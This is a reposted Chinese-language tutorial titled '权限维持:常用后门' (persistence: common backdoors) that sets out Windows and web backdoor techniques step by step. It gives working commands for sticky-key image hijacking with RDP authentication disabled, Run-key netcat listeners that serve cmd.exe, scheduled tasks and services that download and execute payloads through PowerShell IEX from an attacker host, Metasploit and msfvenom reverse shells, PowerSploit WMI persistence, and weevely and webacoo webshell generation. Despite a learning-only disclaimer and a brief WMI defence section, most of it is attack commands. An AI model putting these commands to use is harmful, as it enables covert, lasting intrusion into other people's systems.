权限维持:常用后门

这篇具有很好参考价值的文章主要介绍了权限维持:常用后门。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

配合 Windows 提权文章

1 粘滞键后门

1.1 粘滞键

windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键是为了一次只能按一个键的人设计的,如按 ctrl+c/v 等组合的键时,就可以单按 5 下 shift 键来启动粘滞键功能,多个组合键就可以依次单个按下来实现,如复制,就可以先按一下 ctrl,然后再按一下 c 即可,这就是粘滞键功能。

1.1.1 设置粘滞键后门

通过注册表来实现,整体的方法思路就是通过修改注册表的映像劫持和打开其远程桌面来实现。

什么是映像劫持,简单理解就是当自己打开程序 a 的时候,实际上是打开的程序 b。这个功能是 windows 自带提供给一些开发调试软件用的,但常常也被恶意的病毒木马利用,比如我们要记录的当打开粘滞键 setch 的时候却打开了 cmd。

# 在注册表的 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ 位置添加被劫持的程序
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
# reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。
# Image File Execution Option 用来设置镜像劫持命令中的 sethc 粘滞键程序
# /v 指定键名,这个键名 debugger 是固定的
# /t 来指定类型,即 REG_SZ 字符串类型
# /d 来指定键的值,即被恶意替换的程序,此处为 cmd程序。

# 把远程桌面链接的用户鉴定选项设置为关闭状态
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0

# 把远程桌面连接的安全层设置为 0
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0

1.2 配置开启远程桌面连接

# 配置防火墙允许远程桌面连接
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
# 设置注册表允许远程桌面连接
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

权限维持:常用后门

1.3 详细建议阅读此处文章

  • 粘滞键后门详述_发哥微课堂-CSDN博客_粘滞键后门

2 注册表后门

2.1 系统命令 reg

在普通用户权限下,将后门程序或脚本路径填写到注册表键 HKCU:Software\Microsoft\Windows\CurrentVersion\Run 中,当管理员登录系统时,后门就会运行。

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\user01\Desktop\smb-payload.exe" /f

2.1 用 metepreter 添加注册表 nc 后门

# 使用的命令
meterpreter >upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

# 若目标开启UAC,可能导致会上传失败,需要利用漏洞获取system 权限关闭 UAC,如bypassuac模块
meterpreter > execute -f cmd.exe -i -H
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

# 查看跟随系统启动的程序有哪些
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

# 设置 nc 远程连接
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 666 -e cmd.exe'

# 查看注册表 nc 远程连接配置
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc


# 打开防火墙端口(metepreter)
meterpreter > execute -f cmd -i -H

# 查看防火墙是否开启
C:\Windows\system32>netsh firewall show opmode

# 防火墙放行 666端口
C:\Windows\system32>netsh firewall add portopening TCP 666 "Network Discovery(ac)" ENABLE ALL

# root@kali:~# nc 192.168.10.142 666

3 计划任务后门

3.1 系统命令 schtasks

# 添加计划任务(用户登陆)
schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring(''http://192.168.0.2/evil.exe'''))'" /sc onlogon /ru System

# 添加计划任务(系统启动)
schtasks /create /tn WindowsUpdate /tr "C:\Users\user01\Desktop\smb-payload.exe" /sc onstart /ru System

# 添加计划任务(系统空闲)
schtasks /create /tn WindowsUpdate /tr "c:windows\system32\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX((new-object net.webclient).downloadstring(''http://192.168.0.2/evil.exe'''))'" /sc onidle /i 1

# 查询计划任务
schtasks /query /tn WindowsUpdate

# 手动运行计划任务
schtasks /run /tn WindowsUpdate

# 删除计划任务
schtasks /delete /tn WindowsUpdate /F

权限维持:常用后门

:如目标主机安装了杀毒软件,其可能会拦截创建的服务

权限维持:常用后门

3.2 MSF 中创建计划任务Payload

use exploit/multi/script/web_delivery
set lhost 192.168.0.2
set uripath /
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.2
# 在目标系统中输入生成的后门代码,就会生成一个新的会话。如果攻击者在目标系统中创建一个计划任务,就会加载生成的后门。

权限维持:常用后门

3.3 PowerSploit 中计划任务后门

Import-Module C:\Users\user01\Desktop\PowerSploit-3.0.0\Persistence\Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle
$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle
Add-Persistence -FilePath ./evilpsh2.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceoption $UserOptions -Verbose
# 生成 Persistence.ps1 文件

# 生成计划任务要执行的 payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f psh-reflection  > Desktop/evilpsh2.ps1 

# 将 Persistence.ps1 文件放到 Web 服务器上,在目标主机中使用管理员权限利用 PoweShell 加载并运行,当目标主机牌空闲状态时,就会执行payload 并反弹shell。
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.2/Persistence.ps1');"

4 WMI 型后门

  • WMI 的两个特征,即无文件和无进程。
  • WMI 型后门只能由具有管理员权限的用户运行。
  • WMI 型后门:通常是用 PowerShell 编写的可以直接从新的 WMI 属性中读取和执行后门代码、给代码加密。其基本原理是:将代码加密存储于 WMI 中,达到所谓的“无文件";当设定的条件被满足时,系统将自动启动 PowerShell 进程去执行后门程序,执行后,进程将会消失(持续时间根据后门的运行情况而定,一般是几秒),达到所谓的“无进程”。
Import-Module .Persistence.psm1
$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM'
$UserOptions = New-UserPersistenceOption -Registry -AtLogon
Add-Persistence -FilePath ./evilpsh2.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose

4.1 防御 WMI 型后门

  1. 删除自动运行列表中的恶意 WMI 条目
  2. 在PowerShell 中使用 Get-WMIObject 命令删除与 WMI 持久化相关的程序组件

5 WEB 后门

5.1 weevely

epinna/weevely3: Weaponized web shell (github.com)

# weevely 连接 webshell 选项
[+] weevely 4.0.1
[!] Error: the following arguments are required: url, password

[+] Run terminal or command on the target
    weevely <URL> <password> [cmd]

[+] Recover an existing session
    weevely session <path> [cmd]

[+] Generate new agent
    weevely generate <password> <path>
    
# weevely 连接 webshell 后的操作选项
:audit_phpconf     审计PHP配置文件
:audit_suidsgid    通过SUID和SGID查找文件,
:audit_filesystem    用于进行错误权限审计的系统文件。
:audit_etcpasswd    通过其他方式获取的密码
:shell_php    执行PHP命令
:shell_sh     执行Shell命令
:shell_su     利用su命令提权
:system_extensions    收集PHP和Web服务器的延伸列表
:system_info        收集系统信息
:backdoor_tcp     在TCP端口处生成一个后门
:sql_dump         导出数据表
:sql_console      执行SQL查询命令或者启动控制台
:net_ifconfig     获取目标网络的地址
:net_proxy        通过本地HTTP端口设置代理
:net_scan        扫描TCP端口
:net_curl        远程执行HTTP请求
:net_phpproxy    在目标系统中安装PHP代理

# 生成webshell
weevely generate ccmd phpshell.php

# 连接webshell
weevely http://192.168.0.6/phpshell.php ccmd

5.2 webacoo 后门

Usage: webacoo [options]
Options:
  -g            Generate backdoor code (-o is required)
  -f FUNCTION   PHP System function to use
        FUNCTION
                1: system       (default)
                2: shell_exec
                3: exec
                4: passthru
                5: popen
  -o OUTPUT     Generated backdoor output filename
  -r            Return un-obfuscated backdoor code
  -t            Establish remote "terminal" connection (-u is required)
  -u URL        Backdoor URL
  -e CMD        Single command execution mode (-t and -u are required)
  -m METHOD     HTTP method to be used (default is GET)
  -c C_NAME     Cookie name (default: "M-cookie")
  -d DELIM      Delimiter (default: New random for each request)
  -a AGENT      HTTP header user-agent (default exist)
  -p PROXY      Use proxy (tor, ip:port or user:pass:ip:port)
  -v LEVEL      Verbose level
        LEVEL
                0: no additional info (default)
                1: print HTTP headers
                2: print HTTP headers + data
  -l LOG        Log activity to file
  -h            Display help and exit
  update        Check for updates and apply if any

# 生成webshell
webacoo -g -o webacooshell.php

# 连接webshell,连接成功后使用“load”命令查看其模块
webacoo -t -u http://192.168.0.6/webacooshell.php

6 服务自启动后门

6.1 系统命令 sc

6.1.1 远程下载 Payload

# 创建服务
# 用法:
# sc <server> create [service name] [binPath= ] <option1> <option2>...
# binPath= <.exe 文件的 BinaryPathName>
sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(' http://192.168.0.2:180/a'))\""

# 设置服务自启动
sc config "Windows Power" start= auto

# 添加服务描述
sc description "Windows Power" "windows auto service"

# 启动服务
net start "Windows Power"

# 删除服务
sc delete "Windows Power"

权限维持:常用后门

:如目标主机安装了杀毒软件,其可能会拦截创建的服务

权限维持:常用后门

6.1.2 利用目标主机上的Payload软件

sc create "smbupdate" binpath= "C:\Users\user01\Desktop\smb-payload.exe"
sc config "smbupdate" start= auto
sc description "smbupdate" "windows SMB update"
net start "smbupdate"
net start "smbupdate"

权限维持:常用后门文章来源地址https://www.toymoban.com/news/detail-451763.html

到了这里,关于权限维持:常用后门的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • 第163天:应急响应-后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
  • 黄金票据权限维持

    目录 黄金票据权限维持 一、Krbtgt账户介绍 二、黄金票据原理 三、实验前提 四、实验步骤 krbtgt用户,是系统在创建域时自动生成的一个帐号,其作用是密钥分发中心的服务账号,其密码是系统随机生成 的,无法登录主机。 TGT=Krbtgt的NTLM哈希加密 1、Kerberos中的TGT和Logon Sess

    2024年02月09日
    浏览(9)
  • 内网权限维持

    内网权限维持

    经测试schtasks计划任务后门只能执行一个,不能触发多个,在目标服务器上没有杀毒软件时可以不做免杀,有杀毒软件的情况下静态和动态免杀都要及格才可以正常执行 介绍: 计划任务在 Windows7及之前版本的操作系统中使用at命令调用,在从 Windows8版本开始的操作系统中使用

    2024年02月06日
    浏览(7)
  • 影子账户——权限维持

    影子账户——权限维持

    定义 拥有管理员权限,但除了注册表外均查不到的账户。 创建 1、以管理员身份打开命令提示符 2、创建隐藏用户 3、将隐藏用户添加到管理员组 查看一下,没有显示匿名用户 4、查看《本地用户和组》,我是家庭版Windows,没有找到 试了用管理员身份打开也没有 原因如下 可

    2023年04月21日
    浏览(7)
  • 巧用OpenSSH进行域内权限维持

    巧用OpenSSH进行域内权限维持

    最近在Windows服务器上安装OpenSSH,意外发现了一个很有意思的技巧,可用来做域内权限维持,废话不多说,直接上步骤。 01、利用方式 (1)在已经获得权限的Windows服务器上,使用msiexec安装openssh,一行命令静默安装,不需要任何设置。 (2)在默认安装的情况下,配置文件:

    2024年02月06日
    浏览(7)
  • Windows权限维持--创建隐藏账户(影子账户)

    Windows权限维持--创建隐藏账户(影子账户)

    影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号的账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建的账户,从而实现权限维持。 1、创建

    2024年02月12日
    浏览(8)
  • 1.6 编写双管道ShellCode后门

    1.6 编写双管道ShellCode后门

    本文将介绍如何将 CMD 绑定到双向管道上,这是一种常用的黑客反弹技巧,可以让用户在命令行界面下与其他程序进行交互,我们将从创建管道、启动进程、传输数据等方面对这个功能进行详细讲解。此外,本文还将通过使用汇编语言一步步来实现这个可被注入的 ShellCode 后门

    2024年02月12日
    浏览(10)
  • windows权限维持—SSP&HOOK&DSRM&SIDhistory&SkeletonKey

    windows权限维持—SSP&HOOK&DSRM&SIDhistory&SkeletonKey

      在内网中权限维持是非常重要的一部分,很多的时候再拿下一台服务器的时候,如果没做权限维持,可能今天你还能登陆或者访问,明天你就无法访问了,当然也不排除存在那些服务器常年没人管的情况,像这类的服务器基本上都是存在一些小企业,只要服务器正常运行

    2024年02月12日
    浏览(6)
  • 持久化:Linux利用SUID、任务计划、vim进行权限维持

    持久化:Linux利用SUID、任务计划、vim进行权限维持

    目录 利用Linux SUID进行权限维持 利用Linux计划任务进行权限维持 利用Vim创建后门 利用CVE-2019-12735进行权限维持 使用Vim运行Python后门程序 在前面我们使用Linux的SUID权限进行了权限提升,然后SUID还可以用来进行持久化 利用SUID我们可以解除低权限用户获取高权限,但是这种手段

    2024年02月20日
    浏览(11)
  • Ctfshow web入门 权限维持篇 web670-web679 详细题解 全

    Ctfshow web入门 权限维持篇 web670-web679 详细题解 全

    补充一下PHP中单双引号的区别: 单引号和双引号之间最显着的区别在于我们插入字符串和变量时。单引号不插入字符串和变量。单引号内的内容会按原样打印出来。在大多数情况下,单引号内没有任何变量或转义序列的编译。 但是,在双引号的情况下,写在引号内的变量将

    2024年02月11日
    浏览(7)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包